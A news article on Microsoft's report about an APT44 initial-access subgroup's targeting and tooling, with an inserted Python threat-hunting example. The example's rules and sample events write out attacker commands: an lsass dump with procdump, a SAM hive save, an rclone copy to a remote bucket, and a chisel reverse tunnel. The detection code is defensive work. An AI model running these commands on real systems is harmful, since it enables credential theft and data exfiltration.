Microsoft's earliest observations of the subgroup's activity show opportunistic operations targeting Ukraine, Europe, Central and South Asia, and the Middle East, focusing on critical sectors. Microsoft's Threat Intelligence team says the actor is dedicated to achieving initial access to target systems, establishing persistence, and maintaining presence so that other APT44 subgroups with post-compromise expertise can take over.

Starting in 2022, following Russia's invasion of Ukraine, the subgroup intensified its operations against critical infrastructure supporting Ukraine, including the government, military, transportation, and logistics sectors. By 2023, its targeting scope had broadened to large-scale compromises across Europe, the United States, and the Middle East, and in 2024 it started focusing on the United States, United Kingdom, Canada, and Australia.

The APT44 subgroup employs multiple techniques to compromise networks, including exploiting n-day vulnerabilities in internet-facing infrastructure, credential theft, and supply chain attacks. In 2024, it started using legitimate IT remote management tools such as Atera Agent and Splashtop Remote Services to execute commands on compromised systems while posing as IT admins to evade detection.

"We have also observed the initial access subgroup to pursue access to an organization prior to a Seashell Blizzard-linked destructive attack," reads a Microsoft report shared with BleepingComputer.

"We assess that the subgroup has likely enabled at least three destructive cyberattacks in Ukraine since 2023," Microsoft adds regarding the subgroup's specific activity.

After initial access, the threat actors use Procdump or the Windows registry to steal credentials, and Rclone, Chisel, and Plink to exfiltrate data through covert network tunnels.
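As an added example that is not part of the article or Microsoft's report, the following Python hunting logic flags process-creation events that match the tooling described above (Procdump and registry hive dumps for credential theft, Rclone, Chisel and Plink for tunnelling and exfiltration, and Atera/Splashtop agents). The rule patterns, the event fields and all sample telemetry are constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Hypothetical hunting rules modelled on the tooling named above (Procdump/registry
# credential theft, Rclone/Chisel/Plink tunnels, Atera/Splashtop RMM abuse).
# Assumptions for illustration, not Microsoft's published queries.
RULES = [
    # (rule name, regex on the image path, regex on the command line)
    ("procdump_lsass_dump", r"procdump(64)?\.exe$", r"lsass"),
    ("registry_hive_save", r"\\reg\.exe$", r"\bsave\b.*\\(sam|security|system)\b"),
    ("rclone_transfer", r"\\rclone\.exe$", r"\b(copy|sync|move)\b"),
    ("chisel_reverse_tunnel", r"\\chisel(\.exe)?$", r"\bclient\b.*\bR:"),
    ("plink_port_forward", r"\\plink\.exe$", r"\s-[RLD]\s"),
    # RMM agents are legitimate software: baseline hits against approved tooling first.
    ("rmm_agent_present", r"(ateraagent|splashtop)[^\\]*\.exe$", r""),
]

@dataclass
class Event:
    host: str
    user: str
    image: str     # full path of the started process
    cmdline: str   # its command line

def match_event(ev):
    """Return the names of every rule this process-creation event matches."""
    return [name for name, image_re, cmd_re in RULES
            if re.search(image_re, ev.image, re.I)
            and re.search(cmd_re, ev.cmdline, re.I)]

def hunt(events):
    """Run all rules over a batch of events; one (host, user, rule) per hit."""
    return [(ev.host, ev.user, rule) for ev in events for rule in match_event(ev)]

# Constructed sample telemetry (not real data); the last event is benign.
SAMPLE_EVENTS = [
    Event("ws01", "CORP\\jdoe", r"C:\Tools\procdump64.exe",
          "procdump64.exe -ma lsass.exe out.dmp"),
    Event("ws01", "CORP\\jdoe", r"C:\Windows\System32\reg.exe",
          r"reg save HKLM\SAM C:\Temp\s.hiv"),
    Event("srv02", "CORP\\svc_backup", r"C:\Users\Public\rclone.exe",
          r"rclone.exe copy C:\Share remote:bucket"),
    Event("srv02", "CORP\\svc_backup", r"C:\Users\Public\chisel.exe",
          "chisel.exe client 203.0.113.10:8080 R:3389:127.0.0.1:3389"),
    Event("srv03", "CORP\\it_admin", r"C:\Program Files\AteraAgent\AteraAgent.exe",
          "AteraAgent.exe"),
    Event("ws07", "CORP\\asmith", r"C:\Windows\System32\notepad.exe",
          "notepad.exe notes.txt"),
]
```

Calling `hunt(SAMPLE_EVENTS)` returns one finding per matched rule; in production the same rules would run over EDR or Sysmon process-creation telemetry and the RMM hits would be filtered against the list of agents the organisation actually deploys.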
Microsoft says the Russian hacker subgroup has "near-global reach" and helps Seashell Blizzard expand its geographical targeting. Supply-chain attacks were particularly effective against organizations across Europe and Ukraine, where the hackers compromised regionally managed IT service providers and then accessed multiple clients.

Finally, the subgroup performs lateral movement to reach every part of the network it can, and modifies the infrastructure as required for its operations.

In the report published today, the researchers share hunting queries, indicators of compromise (IoCs), and YARA rules for defenders to catch this threat actor's activity and stop it before .

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Wed, 12 Feb 2025 19:39:16 +0000